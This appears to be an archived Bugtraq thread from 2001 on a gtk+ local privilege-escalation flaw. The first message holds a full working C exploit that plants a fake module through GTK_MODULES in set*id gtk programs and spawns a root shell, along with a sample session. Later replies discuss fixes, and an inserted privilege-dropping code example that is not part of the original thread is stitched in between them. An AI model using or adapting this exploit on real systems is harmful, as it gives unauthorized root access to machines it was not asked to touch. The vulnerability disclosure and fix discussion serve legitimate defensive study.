5907881 2001-01-02 00:15 +0000  /156 lines/ Chris Sharp <v9@FAKEHALO.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-01-02  20:23  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: v9@FAKEHALO.ORG
Recipient: Bugtraq (import) <14567>
Subject: gtk+ security hole.
------------------------------------------------------------
From: Chris Sharp <v9@FAKEHALO.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010102001535.14133.qmail@securityfocus.com>

while going through a quick audit of gtk i found:

gtk+ can be tricked into running arbitrary code
via a bogus module.  this means any program using
gtk that is set*id can be exploited via this
method.  here is an exploit i wrote for this
security hole:


original xgtk.c(working/un-wrapped):
http://realhalo.org/xgtk.c


xgtk.c:
/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org].  this will give
   you the euid/egid of a set*id program using gtk+.  this exploit works via
   the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
   functions/commands with a bogus module. (using gtk_module_init())

   example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x   1 root     tty        437625 Oct 23  1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]

[*] making module for gtk+ to execute. (/tmp/gtkm.c)
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module compiled. (/tmp/gtkm.so)
[*] done, setting up the environment. (module&display)
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
#
-------------------------------------------------------------------------------

   note: this will require a valid display to exploit successfully.  also, i'm
         unsure of this for other gtk versions, i would just assume as much
         that this applies to it.
*/
#define GCCPATH "/usr/bin/gcc"  // path to gcc.
#define SRCFILE "/tmp/gtkm.c"   // source to the fake module to load.
#define MODEXEC "/tmp/gtkm.so"  // fake module to load.
#define DISPLAY ":0.0"          // default display. (also argv option)
#define EXECUTE "/bin/sh"       // execute this program.
#include <stdio.h>
#include <stdlib.h>             // exit(), system(), setenv()
#include <string.h>             // strncpy()
#include <unistd.h>             // unlink(), execl()
#include <sys/stat.h>
int main(int argc,char **argv){
 char cmd[256],syscmd[256],display[256];
 struct stat mod1,mod2,mod3;
 FILE *source;
 fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
 "\n");
 if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
 else{
  fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
  exit(-1);
 }
 if(argc>2){strncpy(display,argv[2],sizeof(display));}
 else{strncpy(display,DISPLAY,sizeof(display));}
 if(stat(cmd,&mod1)){
  fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
  exit(-1);
 }
 if(stat(GCCPATH,&mod2)){
  fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
  exit(-1);
 }
 fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
 fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
 unlink(SRCFILE);
 unlink(MODEXEC);
 source=fopen(SRCFILE,"w");
 if(!source){
  fprintf(stderr,"[!] failed, could not create %s.\n",SRCFILE);
  exit(-1);
 }
 // the fake module: gtk_init() dlopen()s it and calls gtk_module_init(),
 // so whatever is in that function runs with the target's effective ids.
 fprintf(source,"#include <stdio.h>\n");
 fprintf(source,"#include <unistd.h>\n");   // unlink(), execl(), get*id()
 fprintf(source,"void gtk_module_init(){\n");
 fprintf(source," unlink(\"%s\");\n",SRCFILE);
 fprintf(source," unlink(\"%s\");\n",MODEXEC);
 fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n"
 "\");\n");
 fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
 ", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
 fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
 fprintf(source," execl(\"%s\",\"%s\",(char *)0);\n",EXECUTE,EXECUTE);
 fprintf(source,"}\n");
 fclose(source);
 fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
 MODEXEC);
 // -fPIC: current toolchains refuse to build a shared object from non-PIC code.
 snprintf(syscmd,sizeof(syscmd),"%s -shared -fPIC -o %s %s 1>/dev/null 2>&1",
 GCCPATH,MODEXEC,SRCFILE);
 system(syscmd);
 fprintf(stderr,"[*] done, checking to see if the module compiled. (%s)\n",
 MODEXEC);
 if(stat(MODEXEC,&mod3)){
  fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
  MODEXEC);
  exit(-1);
 }
 fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
 setenv("GTK_MODULES",MODEXEC,1);
 setenv("DISPLAY",display,1);
 fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
 if(execl(cmd,cmd,(char *)0)){
  fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
  unlink(SRCFILE);
  unlink(MODEXEC);
  exit(-1);
 }
 return 0;
}

Vade79 -> v9@fakehalo.org -> www.fakehalo.org.
(5907881) ------------------------------------------
5912110 2001-01-03 17:46 +0100  /30 lines/ Robert van der Meulen <rvdm@CISTRON.NL>
Sent by: joel@lysator.liu.se
Imported: 2001-01-03  22:21  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: rvdm@CISTRON.NL
Recipient: Bugtraq (import) <14590>
Comment on text 5911335 by Kain <kain@CHAOSIUM.NET>
Subject: Re: gtk+ security hole.
------------------------------------------------------------
Hi,

Quoting Kain (kain@CHAOSIUM.NET):
> On Tue, Jan 02, 2001 at 04:13:58PM -0500, Rob Mosher wrote:
> > A simple fix to this would be to drop privileges before calling
> > gtk_init(), another easy fix is to modify gtk itself, to do this you
> > need to make the following modification of gtkmain.c.  In gtk-1.2.8 it's
> > at approximately line 215, you have:
> IMO, the best way to fix this would be to have libglib/gtk see if euid==0
> and just ignore those variables on init, and quite possibly go so far as
> to ignore "engine" lines in .gtkrcs or maybe filter them....

In the official reply of the gtk+ team, several very valid reasons
are given to _never_ have a suid/setgid gtk program.  If a gtk
program is suid, the suidness is a security hole in itself.  I do not
think gtk should be patched to behave differently when it's running
suid/setgid, as this will only encourage people to make suid/setgid
gtk programs, and we don't want that ;) If there are bugs in the gtk
libs they should (of course) be patched, but specific 'features' for
evading problems occurring when running setuid/setgid should IMHO not
be implemented.

Just my $.02, 

	Robert
-- 
			      Linux Generation
        Life is a sexually transmitted disease with 100% mortality.
(5912110) --------------------------------(Re-wrapped)
Attachment (application/pgp-signature) in text 5912111
5912111 2001-01-03 17:46 +0100  /10 lines/ Robert van der Meulen <rvdm@CISTRON.NL>
Imported: 2001-01-03  22:21  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: rvdm@CISTRON.NL
Recipient: Bugtraq (import) <14591>
Attachment (text/plain) to text 5912110
Subject: Attachment to: Re: gtk+ security hole.
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE6U1dfFLJHZigagQ4RAoL4AKC0HL/sZXuZZbZdE7IEwLDcdxMKvACg2BQE
/j+5+IDGEMXaUU3RAd8n8HQ=
=8P5j
-----END PGP SIGNATURE-----
(5912111) ------------------------------------------
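The first fix quoted in the reply above, dropping privileges before gtk_init(), done so that the drop cannot be undone by the module that gtk_init() then loads. This is an added example and not code from the original thread or from gtk+; it assumes a Linux/glibc host (setresuid, setresgid and getresuid are Linux-specific), and the function names are the example's own.

```c
/* Added example, not from the original thread or from gtk+: permanently
 * drop set*id privilege before gtk_init() and verify the drop, so a module
 * named in GTK_MODULES runs with no more than the invoking user has.
 * Assumes Linux/glibc (setresuid/setresgid/getresuid are Linux-specific). */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Declared explicitly so the file builds even when the feature macro above
 * was not seen before the first system header was included. */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);
int getresgid(gid_t *rgid, gid_t *egid, gid_t *sgid);
int setgroups(size_t size, const gid_t *list);

/* Become uid/gid in all three id slots (real, effective, saved).
 * Returns 0 on success, -1 with errno set on failure. Order matters:
 * supplementary groups and the gid go first, while we may still be root,
 * because after the uid is gone neither can be changed any more. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    return 0;
}

/* 1 only if every slot equals the target. A plain setgid()/seteuid() in a
 * set*id program leaves the saved id privileged, and the loaded module can
 * simply set it back; checking all three slots catches that. */
int privileges_fully_dropped(uid_t uid, gid_t gid)
{
    uid_t r, e, s;
    gid_t rg, eg, sg;
    if (getresuid(&r, &e, &s) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return 0;
    return r == uid && e == uid && s == uid
        && rg == gid && eg == gid && sg == gid;
}

/* What a set*id gtk program's main() should do before calling gtk_init().
 * Returns 0 when the process now holds exactly the invoking user's ids. */
int drop_to_invoking_user(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (drop_privileges_permanently(uid, gid) != 0)
        return -1;
    if (!privileges_fully_dropped(uid, gid))
        return -1;
    return 0;
}

int main(void)
{
    if (drop_to_invoking_user() != 0) {
        perror("could not drop privileges");
        return 1;
    }
    /* gtk_init(&argc, &argv) would go here, after the ids are settled. */
    printf("uid %u euid %u gid %u egid %u\n",
           (unsigned)getuid(), (unsigned)geteuid(),
           (unsigned)getgid(), (unsigned)getegid());
    return 0;
}
```

Run as an unprivileged user the drop is a no-op that still succeeds, which is what lets the same code sit unconditionally at the top of main(); installed set-group-id tty as in the first message, the printed egid is the caller's own, and anything gtk_init() loads from GTK_MODULES runs without the group. A program that actually needs the privilege later cannot use this fix and must instead never let gtk_init() see an attacker-controlled environment.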
5912227 2001-01-03 16:15 -0500  /18 lines/ Rob Mosher <rmosher@LIGHTNING.NET>
Sent by: joel@lysator.liu.se
Imported: 2001-01-03  23:14  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: rmosher@LIGHTNING.NET
Recipient: Bugtraq (import) <14595>
Comment on text 5911374 by Rob Mosher <rmosher@LIGHTNING.NET>
Subject: Re: gtk+ security hole.
------------------------------------------------------------
From: Rob Mosher <rmosher@LIGHTNING.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3A53966D.6090307@lightning.net>

As pointed out by chris, GTK also accepts --gtk-module from the
command line, at around line 238 in gtk-1.2.8, you can make sure euid
== uid to prevent this from happening.  i.e.:

if ((strcmp ("--gtk-module", (*argv)[i]) == 0 ||
     strncmp ("--gtk-module=", (*argv)[i], 13) == 0) && geteuid() == getuid())


--
Rob Mosher
Lead Programmer / Systems Engineer
Lightning Internet Services, LLC
(5912227) --------------------------------(Re-wrapped)